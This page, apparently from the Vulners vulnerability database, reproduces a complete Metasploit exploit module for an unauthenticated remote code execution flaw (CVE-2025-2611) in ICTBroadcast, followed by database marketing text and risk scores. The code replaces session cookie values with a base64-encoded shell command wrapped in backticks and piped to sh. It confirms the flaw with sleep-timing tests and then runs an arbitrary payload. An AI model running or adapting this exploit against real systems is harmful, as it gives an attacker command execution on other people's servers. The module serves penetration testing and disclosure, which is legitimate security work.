Lucene search
K

ICTBroadcast Unauthenticated Remote Code Execution

🗓️ 05 Aug 2025 18:56:42Reported by Valentin LobsteinType 
metasploit
 metasploit
🔗 www.rapid7.com👁 595 Views

Exploits an unauthenticated remote code execution in ICTBroadcast via crafted session cookies to run commands.

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ICTBroadcast Unauthenticated Remote Code Execution',
        'Description' => %q{
          This module exploits an unauthenticated remote code execution (RCE) vulnerability
          in ICTBroadcast. The vulnerability exists in the way session cookies are handled
          and processed, allowing an attacker to inject arbitrary system commands.
        },
        'Author' => [
          'Valentin Lobstein' # Metasploit module author and vulnerability discovery
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://www.ictbroadcast.com/'],
          ['CVE', '2025-2611']
        ],
        'Targets' => [
          [
            'Unix/Linux Command Shell',
            {
              'Platform' => %w[unix linux],
              'Arch' => ARCH_CMD
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Privileged' => false,
        'DisclosureDate' => '2025-03-19',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
  end

  def get_valid_cookies
    @get_valid_cookies ||= begin
      print_status('Retrieving session cookies dynamically')
      res = send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, 'login.php')
      )
      fail_with(Failure::UnexpectedReply, 'No response from server') unless res

      if (cookies = res.get_cookies)
        cookie_jar.clear
        cookie_jar.parse_and_merge(
          cookies,
          "#{datastore['SSL'] ? 'https' : 'http'}://#{rhost}:#{rport}"
        )
        print_status("Found cookies: #{cookie_jar.cookies.map(&:to_s).join('; ')}")
      end

      cookie_jar
    end
  end

  def inject_command(command)
    jar = get_valid_cookies
    return if jar.empty?

    jar.cookies.each do |c|
      original = c.value
      c.value = "`echo${IFS}#{Rex::Text.encode_base64(command)}|base64${IFS}-d|sh`"

      send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, 'login.php'),
        'cookie_jar' => jar
      )

      c.value = original
    end
  end

  def check
    print_status('Checking ICTBroadcast via JS fingerprints')

    fingerprint_found = %w[
      IVRDesigner.js agent.js campaign.js campaign_feedback.js
      campaign_integration.js phone.js supervisor.js trunk.js
    ].any? do |file|
      uri = normalize_uri(target_uri.path, 'js', file)
      res = send_request_cgi!('method' => 'GET', 'uri' => uri)
      res&.code == 200 && res.body.include?('ICT Innovations')
    end

    return CheckCode::Safe('The target is not vulnerable') unless fingerprint_found

    print_good('JS fingerprint found; performing timing tests')

    [3, 4, 5].sample(2).each do |t|
      start = Time.now
      inject_command("sleep #{t}")
      if Time.now - start >= (t - 0.3)
        return CheckCode::Vulnerable("Injected RCE (slept #{t}s)")
      end
    end

    CheckCode::Appears('Fingerprint present but timing did not match')
  end

  def exploit
    inject_command(payload.encoded)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jul 2026 19:02Current
7.5High risk
Vulners AI Score7.5
CVSS 49.3
EPSS0.06078
SSVC
595